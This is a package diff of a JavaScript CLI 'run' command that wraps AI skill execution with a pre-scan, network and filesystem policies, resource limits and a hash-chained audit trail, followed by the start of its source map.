+ console.log(` ${chalk.white('Filesystem:')} ${report.filesystemViolations === 0 ? chalk.green('0 violations') : chalk.red(`${report.filesystemViolations} violation(s)`)}`);
56
+ console.log(` ${chalk.white('Runtime Threats:')} ${report.runtimeThreats === 0 ? chalk.green('0 detected') : chalk.red(`${report.runtimeThreats} detected`)}`);
57
+ // Performance
58
+ console.log(` ${chalk.white('Duration:')} ${chalk.gray(`${report.durationMs}ms`)}`);
59
+ // Audit trail
60
+ console.log('');
61
+ console.log(` ${chalk.white('Audit Chain:')} ${report.auditLength} entries`);
62
+ if (report.auditHash) {
63
+ console.log(` ${chalk.white('Latest Hash:')} ${chalk.gray(report.auditHash.slice(0, 24) + '...')}`);
64
+ }
65
+ console.log(` ${chalk.white('Chain Integrity:')} ${report.auditVerified ? chalk.green('VERIFIED') : chalk.red('TAMPERED')}`);
66
+ console.log(sep);
67
+ }
6
68
  export function run(program) {
7
69
  program
8
70
  .command('run <skill>')
9
- .description(chalk.cyan('Execute a skill with any AI model'))
71
+ .description(chalk.cyan('Execute a skill with full runtime security enforcement'))
10
72
  .option('--model <model>', 'Model to use (e.g., deepseek-chat, ollama/qwen2.5, gpt-4o)')
11
73
  .option('--provider <provider>', 'Force provider (openai, anthropic, deepseek, qwen, ollama, groq)')
12
74
  .option('--input <prompt>', 'Input prompt for the skill')
13
- .option('--no-scan', 'Skip security scan')
75
+ .option('--no-scan', 'Skip pre-execution security scan')
76
+ .option('--no-shield', 'Disable runtime enforcement (scan only)')
14
77
  .option('--stream', 'Stream output token by token')
15
78
  .option('--channel <type>', 'Run via messaging channel (whatsapp, telegram, discord, slack)')
16
79
  .option('--json', 'Output as JSON')
17
80
  .option('-V, --verbose', 'Verbose output')
81
+ .option('--timeout <ms>', 'Max execution time in ms (default: 60000)')
82
+ .option('--max-memory <mb>', 'Max memory in MB (default: 512)')
83
+ .option('--allow-domains <domains>', 'Comma-separated list of allowed domains')
84
+ .option('--audit-file <path>', 'Save audit trail to JSON file')
18
85
  .action(async (skill, cmdOptions, cmd) => {
19
86
  try {
20
- // Merge subcommand options with parent (global) options
21
87
  const parentOpts = cmd.parent?.opts?.() || {};
22
88
  const options = { ...parentOpts, ...cmdOptions };
23
- // Step 1: Security scan (unless --no-scan)
89
+ const isVerbose = options.verbose || false;
90
+ let scanScore = 100;
91
+ let scanStatus = 'SKIPPED';
92
+ let skillContent = '';
93
+ // ──────────────────────────────────────────────────────────
94
+ // PHASE 1: LOAD + PRE-SCAN
95
+ // ──────────────────────────────────────────────────────────
96
+ const loadSpinner = ora('Loading skill...').start();
97
+ try {
98
+ skillContent = await loadSkill(skill);
99
+ loadSpinner.succeed(chalk.green(`Skill loaded: ${basename(skill)}`));
100
+ }
101
+ catch (err) {
102
+ loadSpinner.fail(chalk.red(`Cannot load skill: ${skill}`));
103
+ const msg = err instanceof Error ? err.message : String(err);
104
+ console.error(chalk.red(` ${msg}`));
105
+ process.exit(1);
106
+ }
24
107
  if (options.noScan !== false) {
25
- const scanSpinner = ora(t('run.scanning') || 'Scanning for threats...').start();
108
+ const scanSpinner = ora('Scanning for threats (72+ patterns, 14 categories)...').start();
26
109
  try {
27
- // Load skill first to scan its content
28
- const content = await loadSkill(skill);
29
- const scanResult = await scanSkill(content);
110
+ const scanResult = await scanSkill(skillContent);
111
+ scanScore = scanResult.score;
112
+ scanStatus = scanResult.status;
30
113
  if (scanResult.status === 'BLOCKED') {
31
- scanSpinner.fail(chalk.red('BLOCKED — Malicious skill detected'));
114
+ scanSpinner.fail(chalk.red.bold('BLOCKED — Malicious skill detected'));
32
115
  console.log(chalk.red(`\n SkillGuard Score: ${scanResult.score}/100`));
33
116
  if (scanResult.hash) {
34
117
  console.log(chalk.red(` Hash: ${scanResult.hash.slice(0, 16)}...`));
@@ -36,8 +119,8 @@ export function run(program) {
36
119
  for (const threat of scanResult.threats) {
37
120
  console.log(chalk.red(` [${threat.severity.toUpperCase()}] ${threat.description}`));
38
121
  }
39
- console.log(chalk.yellow('\nThis skill has been blocked for safety. Use --no-scan to override (NOT recommended).'));
40
- console.log(chalk.gray('This hash has been added to your local blocklist to protect you in the future.'));
122
+ console.log(chalk.yellow('\n This skill has been blocked for safety.'));
123
+ console.log(chalk.gray(' Use --no-scan to override (NOT recommended).'));
41
124
  process.exit(1);
42
125
  }
43
126
  if (scanResult.status === 'REVIEW_REQUIRED') {
@@ -48,108 +131,179 @@ export function run(program) {
48
131
  : chalk.blue;
49
132
  console.log(` ${color(`[${threat.severity}]`)} ${threat.description}`);
50
133
  }
51
- if (scanResult.sandboxRecommended) {
52
- console.log(chalk.cyan('\n TIP: This skill has suspicious patterns. Consider running with --sandbox:'));
53
- console.log(chalk.cyan(' skillkit run ' + skill + ' --sandbox'));
54
- }
55
134
  if (!options.json) {
56
135
  const answer = await new Promise((resolve) => {
57
- process.stdout.write(chalk.yellow('\nContinue anyway? (yes/no): '));
136
+ process.stdout.write(chalk.yellow('\n Continue with runtime shield active? (yes/no): '));
58
137
  process.stdin.once('data', (data) => {
59
138
  resolve(data.toString().trim().toLowerCase() === 'yes');
60
139
  });
61
140
  });
62
141
  if (!answer) {
63
- console.log(chalk.gray('Cancelled'));
142
+ console.log(chalk.gray(' Cancelled'));
64
143
  process.exit(0);
65
144
  }
66
145
  }
67
146
  }
68
147
  else {
69
- scanSpinner.succeed(chalk.green(`Security: ${scanResult.score}/100 — safe`));
148
+ scanSpinner.succeed(chalk.green(`Pre-scan: ${scanResult.score}/100 — safe`));
70
149
  }
71
150
  }
72
- catch (error) {
73
- scanSpinner.warn(chalk.yellow('Security scan skipped (could not read skill)'));
151
+ catch {
152
+ scanSpinner.warn(chalk.yellow('Pre-scan skipped (could not read skill)'));
153
+ }
154
+ }
155
+ // ──────────────────────────────────────────────────────────
156
+ // PHASE 2: ACTIVATE SHIELD
157
+ // ──────────────────────────────────────────────────────────
158
+ let shield = null;
159
+ if (options.noShield !== true) {
160
+ printShieldBanner();
161
+ // Parse policies from options
162
+ const shieldConfig = {
163
+ skillId: basename(skill, '.md'),
164
+ workDir: process.cwd(),
165
+ enableAudit: true,
166
+ verbose: isVerbose,
167
+ };
168
+ // Apply CLI overrides
169
+ if (options.timeout) {
170
+ shieldConfig.monitorPolicy = {
171
+ maxExecutionTime: parseInt(options.timeout, 10),
172
+ };
173
+ }
174
+ if (options.maxMemory) {
175
+ shieldConfig.monitorPolicy = {
176
+ ...shieldConfig.monitorPolicy,
177
+ maxMemoryMB: parseInt(options.maxMemory, 10),
178
+ };
179
+ }
180
+ if (options.allowDomains) {
181
+ const domains = options.allowDomains.split(',').map(d => d.trim());
182
+ shieldConfig.networkPolicy = {
183
+ allowedDomains: domains,
184
+ defaultDeny: true,
185
+ };
186
+ }
187
+ shield = new SkillShield(shieldConfig);
188
+ // Record scan in audit trail
189
+ shield.audit.scanStart(72, 14);
190
+ shield.audit.scanComplete(scanScore, 0, scanStatus);
191
+ if (isVerbose) {
192
+ console.log(chalk.gray(' [Shield] Network Policy: default-deny active'));
193
+ console.log(chalk.gray(' [Shield] Filesystem Jail: sensitive paths protected'));
194
+ console.log(chalk.gray(' [Shield] Kill Switch: armed'));
195
+ console.log(chalk.gray(' [Shield] Audit Trail: recording'));
196
+ console.log('');
74
197
  }
75
198
  }
76
- // Step 2: Load skill
77
- const loadSpinner = ora(t('run.loading') || 'Loading skill...').start();
78
- const skillContent = await loadSkill(skill);
79
- loadSpinner.succeed(chalk.green('Skill loaded'));
80
- // Step 3: Show execution context
199
+ // ──────────────────────────────────────────────────────────
200
+ // PHASE 3: EXECUTE WITH ENFORCEMENT
201
+ // ──────────────────────────────────────────────────────────
81
202
  const modelDisplay = options.model || 'auto-detect';
82
203
  const providerDisplay = options.provider || 'auto-detect';
83
- console.log(chalk.dim(`\n Model: ${modelDisplay}`));
204
+ console.log(chalk.dim(` Model: ${modelDisplay}`));
84
205
  console.log(chalk.dim(` Provider: ${providerDisplay}`));
85
206
  if (options.input) {
86
207
  console.log(chalk.dim(` Input: "${options.input.slice(0, 80)}${options.input.length > 80 ? '...' : ''}"`));
87
208
  }
88
- // Step 4: Execute with REAL AI
89
- const execSpinner = options.stream ? null : ora(t('run.executing') || 'Executing skill...').start();
209
+ console.log('');
210
+ const execSpinner = options.stream ? null : ora('Executing skill with shield active...').start();
90
211
  if (options.stream) {
91
- console.log(chalk.cyan.bold('\n📤 Output:\n'));
212
+ console.log(chalk.cyan.bold(' Output:\n'));
92
213
  }
93
214
  const startTime = Date.now();
215
+ // Record execution start in audit trail
216
+ if (shield) {
217
+ const activePolicies = ['network-policy', 'filesystem-jail', 'kill-switch', 'audit-trail'];
218
+ shield.audit.executionStart(options.model || 'auto', activePolicies);
219
+ }
94
220
  try {
221
+ // Dynamic import for executor (may fail if no AI provider configured)
222
+ const { executeSkill } = await import('../../runtime/executor.js');
95
223
  const result = await executeSkill({
96
224
  content: skillContent,
97
225
  input: options.input || '',
98
226
  model: options.model,
99
227
  provider: options.provider,
100
228
  channel: options.channel,
101
- verbose: options.verbose,
229
+ verbose: isVerbose,
102
230
  stream: options.stream,
103
231
  });
104
232
  if (execSpinner) {
105
- execSpinner.succeed(chalk.green(t('run.complete') || 'Execution complete'));
233
+ execSpinner.succeed(chalk.green('Execution complete'));
106
234
  }
107
- // Show output (non-streaming mode)
235
+ // Show output
108
236
  if (!options.stream) {
109
- console.log(chalk.cyan.bold('\n📤 Output:\n'));
237
+ console.log(chalk.cyan.bold('\n Output:\n'));
110
238
  console.log(result.output);
111
239
  }
112
240
  else {
113
- console.log(''); // newline after streamed output
241
+ console.log('');
114
242
  }
115
- // Show stats
243
+ // Stats
116
244
  const elapsed = (Date.now() - startTime) / 1000;
117
- console.log(chalk.dim(`\n⏱️ Time: ${elapsed.toFixed(2)}s`));
118
- console.log(chalk.dim(`🤖 Model: ${result.provider}/${result.model}`));
245
+ console.log(chalk.dim(`\n Time: ${elapsed.toFixed(2)}s`));
246
+ console.log(chalk.dim(` Model: ${result.provider}/${result.model}`));
119
247
  if (result.tokenUsage) {
120
- console.log(chalk.dim(`📊 Tokens: ${result.tokenUsage.input} in / ${result.tokenUsage.output} out`));
248
+ console.log(chalk.dim(` Tokens: ${result.tokenUsage.input} in / ${result.tokenUsage.output} out`));
121
249
  }
122
- // JSON output
123
- if (options.json) {
124
- console.log(JSON.stringify({
125
- success: true,
126
- output: result.output,
127
- model: result.model,
128
- provider: result.provider,
129
- tokenUsage: result.tokenUsage,
130
- duration: result.duration,
131
- }, null, 2));
250
+ // Record successful execution in audit trail
251
+ if (shield) {
252
+ const durationMs = Date.now() - startTime;
253
+ shield.audit.executionEnd(0, durationMs, false);
132
254
  }
133
255
  }
134
256
  catch (error) {
135
257
  if (execSpinner)
136
- execSpinner.fail(chalk.red(t('run.failed') || 'Execution failed'));
258
+ execSpinner.fail(chalk.red('Execution failed'));
137
259
  const msg = error instanceof Error ? error.message : String(error);
260
+ // Record failure in audit trail
261
+ if (shield) {
262
+ const failDuration = Date.now() - startTime;
263
+ shield.audit.executionEnd(1, failDuration, false);
264
+ }
138
265
  // Helpful error messages
139
266
  if (msg.includes('API key')) {
140
- console.error(chalk.red(`\n${msg}`));
141
- console.log(chalk.yellow('\nTip: Set your API key with:'));
142
- console.log(chalk.cyan(' export DEEPSEEK_API_KEY=your-key # Free: deepseek.com'));
143
- console.log(chalk.cyan(' export GROQ_API_KEY=your-key # Free: groq.com'));
144
- console.log(chalk.cyan(' export ANTHROPIC_API_KEY=your-key # Paid: anthropic.com'));
145
- console.log(chalk.yellow('\nOr use a free local model:'));
146
- console.log(chalk.cyan(' skillkit run my-skill.md --model ollama/qwen2.5'));
267
+ console.error(chalk.red(`\n ${msg}`));
268
+ console.log(chalk.yellow('\n Tip: Set your API key with:'));
269
+ console.log(chalk.cyan(' export DEEPSEEK_API_KEY=your-key # Free: deepseek.com'));
270
+ console.log(chalk.cyan(' export GROQ_API_KEY=your-key # Free: groq.com'));
271
+ console.log(chalk.cyan(' export ANTHROPIC_API_KEY=your-key # Paid: anthropic.com'));
272
+ console.log(chalk.yellow('\n Or use a free local model:'));
273
+ console.log(chalk.cyan(' skillshield run my-skill.md --model ollama/qwen2.5'));
147
274
  }
148
275
  else {
149
- console.error(chalk.red(`\n${msg}`));
276
+ console.error(chalk.red(`\n ${msg}`));
277
+ }
278
+ // Still show shield report even on failure
279
+ if (shield) {
280
+ const durationMs = Date.now() - startTime;
281
+ const report = shield.getReport(scanScore, scanStatus, durationMs);
282
+ printShieldReport(report, isVerbose);
283
+ // Save audit trail if requested
284
+ if (options.auditFile) {
285
+ saveAuditTrail(shield, options.auditFile);
286
+ }
150
287
  }
151
288
  process.exit(1);
152
289
  }
290
+ // ──────────────────────────────────────────────────────────
291
+ // PHASE 4: SHIELD REPORT
292
+ // ──────────────────────────────────────────────────────────
293
+ if (shield) {
294
+ const durationMs = Date.now() - startTime;
295
+ const report = shield.getReport(scanScore, scanStatus, durationMs);
296
+ if (options.json) {
297
+ console.log(JSON.stringify(report, null, 2));
298
+ }
299
+ else {
300
+ printShieldReport(report, isVerbose);
301
+ }
302
+ // Save audit trail if requested
303
+ if (options.auditFile) {
304
+ saveAuditTrail(shield, options.auditFile);
305
+ }
306
+ }
153
307
  }
154
308
  catch (error) {
155
309
  console.error(chalk.red(`Error: ${error instanceof Error ? error.message : String(error)}`));
@@ -157,4 +311,18 @@ export function run(program) {
157
311
  }
158
312
  });
159
313
  }
314
+ /**
315
+ * Save the audit trail to a JSON file for compliance/forensics.
316
+ */
317
+ function saveAuditTrail(shield, filePath) {
318
+ try {
319
+ const auditData = shield.audit.toJSON();
320
+ const resolved = resolve(filePath);
321
+ writeFileSync(resolved, JSON.stringify(auditData, null, 2));
322
+ console.log(chalk.gray(`\n Audit trail saved: ${resolved}`));
323
+ }
324
+ catch (err) {
325
+ console.error(chalk.yellow(` Warning: Could not save audit trail: ${err}`));
326
+ }
327
+ }
160
328
  //# sourceMappingURL=run.js.map
package/dist/cli/commands/run.js.map CHANGED
@@ -1 +1 @@
1
- {"version":3,"file":"run.js","sourceRoot":"","sources":["../../../src/cli/commands/run.ts"],"names":[],"mappings":"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"}
1
+ {"version":3,"file":"run.js","sourceRoot":"","sources":["../../../src/cli/commands/run.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;GAWG;AAEH,OAAO,KAAK,MAAM,OAAO,CAAC;AAC1B,OAAO,GAAG,MAAM,KAAK,CAAC;AAGtB,OAAO,EAAE,OAAO,EAAE,QAAQ,EAAE,MAAM,MAAM,CAAC;AACzC,OAAO,EAAE,aAAa,EAAqC,MAAM,IAAI,CAAC;AAGtE,OAAO,EAAE,SAAS,EAAE,SAAS,EAAE,MAAM,2BAA2B,CAAC;AACjE,OAAO,EAAE,WAAW,EAAwC,MAAM,uBAAuB,CAAC;AAkB1F;;GAEG;AACH,SAAS,iBAAiB;IACxB,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,0DAA0D,CAAC,CAAC,CAAC;IACpF,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,KAAK,CAAC,GAAG,KAAK,CAAC,IAAI,CAAC,KAAK,CAAC,kDAAkD,CAAC,GAAG,KAAK,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,CAAC;IACxH,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,KAAK,CAAC,GAAG,KAAK,CAAC,IAAI,CAAC,mDAAmD,CAAC,GAAG,KAAK,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC,CAAC;IACnH,OAAO,CAAC,GAAG,CAAC,KAAK,CAAC,IAAI,CAAC,0DAA0D,CAAC,CAAC,CAAC;AACtF,C